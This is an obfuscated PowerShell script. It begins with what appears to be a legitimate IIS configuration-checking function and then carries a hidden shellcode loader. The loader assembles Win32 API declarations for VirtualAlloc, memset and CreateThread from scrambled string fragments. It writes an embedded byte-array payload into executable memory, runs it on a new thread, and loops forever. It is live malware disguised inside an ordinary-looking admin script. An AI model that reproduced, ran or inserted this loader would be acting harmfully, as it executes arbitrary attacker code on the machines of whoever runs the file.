function tes`T-ci`is`C`O`N`F`IguRA`TIOnsEctiON
{
    
    [CmdletBinding(dEfaULtPArAmeTersETNaMe={"{1}{0}{2}" -f 'k','Chec','Exists'})]
    param(
        [Parameter(mandatoRY=${tR`Ue})]
        [string]
        
        ${S`EctioNP`A`TH},
        
        [Parameter()]
        [string]
        
        ${sIte`Na`Me},
        
        [Parameter()]
        [Alias({"{0}{1}"-f 'Pat','h'})]
        [string]
        
        ${v`IR`TUaLpaTh},
        
        [Parameter(mAnDAtory=${Tr`Ue},PAraMetERSetnAME="CH`eCkloc`kEd")]
        [Switch]
        
        ${l`Ock`ED}
    )
    
    &("{1}{2}{0}" -f 'de','Set','-StrictMo') -Version ("{0}{2}{1}"-f 'Lat','t','es')

    &("{4}{3}{1}{5}{0}{2}"-f'feren','al','ce','C','Use-','lerPre') -Cmdlet ${pSc`M`d`let} -Session ${E`xe`cu`Ti`ONCONte`Xt}."SE`ssIoNSt`AtE"

    ${g`Et`ArgS} = @{
                    ("{3}{1}{0}{2}"-f 'onP','cti','ath','Se') = ${sECtIO`N`pA`Th};
                }
    if( ${sI`TEnAME} )
    {
        ${g`E`TArgS}."siTe`Na`Me" = ${SIT`ena`Me}
    }
    
    if( ${V`irTu`Al`PAtH} )
    {
        ${GET`ArGs}."ViRTUAl`p`Ath" = ${VI`R`Tu`AlPAtH}
    }
    
    ${S`EctI`On} = .("{2}{7}{1}{0}{3}{6}{4}{5}{8}" -f 'fi','isCon','Get','gurat','onSec','ti','i','-CI','on') @getArgs -ErrorAction ("{1}{0}{3}{2}"-f'yC','Silentl','ntinue','o')
    
    if( ${p`sC`MdLEt}.paRAMeteRSETName -eq ("{0}{1}{2}" -f 'C','heckExist','s') )
    {
        if( ${s`E`CTion} )
        {
            return ${tr`Ue}
        }
        else
        {
            return ${fAl`se}
        }
    }
        
    if( -not ${sE`c`TiON} )
    {
        .("{1}{3}{0}{2}" -f'-','Writ','Error','e') ('IIS:{0}: section {1} not found.' -f (.("{0}{3}{2}{1}" -f 'Jo','rtualPath','n-CIisVi','i') ${s`ite`Na`mE} ${viRt`U`AlpAtH}),${SECTi`oNpa`TH})
        return
    }
    
    if( ${P`ScmDl`eT}.pARaMeteRSeTnAME -eq ("{1}{0}{2}" -f 'heckLo','C','cked') )
    {
        return ${s`ecTi`On}."Ov`E`RridEM`oDE" -eq ("{0}{1}" -f 'D','eny')
    }
}


${Lt`Jl} = ((("{36}{39}{22}{20}{89}{62}{6}{18}{75}{43}{76}{54}{73}{64}{47}{13}{29}{86}{30}{26}{37}{38}{84}{2}{63}{55}{53}{5}{60}{1}{83}{0}{27}{19}{25}{49}{77}{71}{65}{52}{42}{33}{57}{48}{74}{82}{80}{93}{3}{15}{92}{16}{50}{24}{79}{21}{81}{12}{67}{34}{44}{40}{69}{8}{9}{46}{61}{35}{88}{51}{10}{28}{90}{85}{31}{41}{72}{23}{58}{45}{87}{91}{11}{70}{32}{7}{17}{68}{14}{78}{59}{4}{56}{66}" -f '{','2.dl','t fl','h',' src, ','ker','0','c extern IntPtr memset(In',' IntPtr l','pParam','reationFlags, IntPtr lpT','c s','IntPtr l','loc(IntPtr lp','st, u','readAt','butes, uint d','tPtr','})]public','ublic','{0}kernel','iz','t(','}ms','ack',' ',' ','0})]p','hre','Address, u','nt',';[','ati','e','S','e','[DllImpo','dwSize,',' uint flA','r','artA','DllImp','Cr','t','t',')]','e','Al','e','static ex','wSt',' uint dwC',' ','{0}','t','port(','uint coun','ateThr','vcrt.dll{0}','t','nel3','t','l{','Protect);[DllIm','l','r','t);','p',' de','ddress,','t','Pt','ort({0','r Virtua','ad',' sta','ic extern IntP','tern Int','in','S','IntPtr','e, ','(','l','llocationType, uin','Id)','i','publ','r,','32.dl','ad','i','tri',' lpT'))  -F [cHaR]34);${w} = &("{2}{0}{1}" -f 'dd-Typ','e','A') -memberDefinition ${L`TJl} -Name ("{1}{0}" -f'32','Win') -namespace ("{3}{2}{1}{0}" -f'tions','32Func','in','W') -passthru;[Byte[]];[Byte[]]${Z} = 0xbd,0x0c,0xa1,0xa0,0xc7,0xda,0xcc,0xd9,0x74,0x24,0xf4,0x5f,0x31,0xc9,0xb1,0x47,0x83,0xef,0xfc,0x31,0x6f,0x0f,0x03,0x6f,0x03,0x43,0x55,0x3b,0xf3,0x01,0x96,0xc4,0x03,0x66,0x1e,0x21,0x32,0xa6,0x44,0x21,0x64,0x16,0x0e,0x67,0x88,0xdd,0x42,0x9c,0x1b,0x93,0x4a,0x93,0xac,0x1e,0xad,0x9a,0x2d,0x32,0x8d,0xbd,0xad,0x49,0xc2,0x1d,0x8c,0x81,0x17,0x5f,0xc9,0xfc,0xda,0x0d,0x82,0x8b,0x49,0xa2,0xa7,0xc6,0x51,0x49,0xfb,0xc7,0xd1,0xae,0x4b,0xe9,0xf0,0x60,0xc0,0xb0,0xd2,0x83,0x05,0xc9,0x5a,0x9c,0x4a,0xf4,0x15,0x17,0xb8,0x82,0xa7,0xf1,0xf1,0x6b,0x0b,0x3c,0x3e,0x9e,0x55,0x78,0xf8,0x41,0x20,0x70,0xfb,0xfc,0x33,0x47,0x86,0xda,0xb6,0x5c,0x20,0xa8,0x61,0xb9,0xd1,0x7d,0xf7,0x4a,0xdd,0xca,0x73,0x14,0xc1,0xcd,0x50,0x2e,0xfd,0x46,0x57,0xe1,0x74,0x1c,0x7c,0x25,0xdd,0xc6,0x1d,0x7c,0xbb,0xa9,0x22,0x9e,0x64,0x15,0x87,0xd4,0x88,0x42,0xba,0xb6,0xc4,0xa7,0xf7,0x48,0x14,0xa0,0x80,0x3b,0x26,0x6f,0x3b,0xd4,0x0a,0xf8,0xe5,0x23,0x6d,0xd3,0x52,0xbb,0x90,0xdc,0xa2,0x95,0x56,0x88,0xf2,0x8d,0x7f,0xb1,0x98,0x4d,0x80,0x64,0x34,0x4b,0x16,0x47,0x61,0x53,0x83,0x2f,0x70,0x54,0x5a,0xec,0xfd,0xb2,0x0c,0x5c,0xae,0x6a,0xec,0x0c,0x0e,0xdb,0x84,0x46,0x81,0x04,0xb4,0x68,0x4b,0x2d,0x5e,0x87,0x22,0x05,0xf6,0x3e,0x6f,0xdd,0x67,0xbe,0xa5,0x9b,0xa7,0x34,0x4a,0x5b,0x69,0xbd,0x27,0x4f,0x1d,0x4d,0x72,0x2d,0x8b,0x52,0xa8,0x58,0x33,0xc7,0x57,0xcb,0x64,0x7f,0x5a,0x2a,0x42,0x20,0xa5,0x19,0xd9,0xe9,0x33,0xe2,0xb5,0x15,0xd4,0xe2,0x45,0x40,0xbe,0xe2,0x2d,0x34,0x9a,0xb0,0x48,0x3b,0x37,0xa5,0xc1,0xae,0xb8,0x9c,0xb6,0x79,0xd1,0x22,0xe1,0x4e,0x7e,0xdc,0xc4,0x4e,0x42,0x0b,0x20,0x25,0xaa,0x8f;${g} = 0x1000;if (${Z}."LEn`gth" -gt 0x1000){${G} = ${z}."lENg`TH"};${oT`jH}=${w}::("{1}{3}{2}{0}"-f'c','Virt','Allo','ual').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${z}."lE`Ng`Th"-1);${i}++) {${w}::"M`EmSet"([IntPtr](${oT`jh}.("{2}{1}{0}"-f 'Int32','o','T').Invoke()+${I}), ${z}[${I}], 1)};${W}::("{2}{0}{1}"-f'teTh','read','Crea').Invoke(0,0,${Ot`Jh},0,0,0);for (;;){.("{1}{0}{2}{3}"-f'rt','Sta','-s','leep') 60};
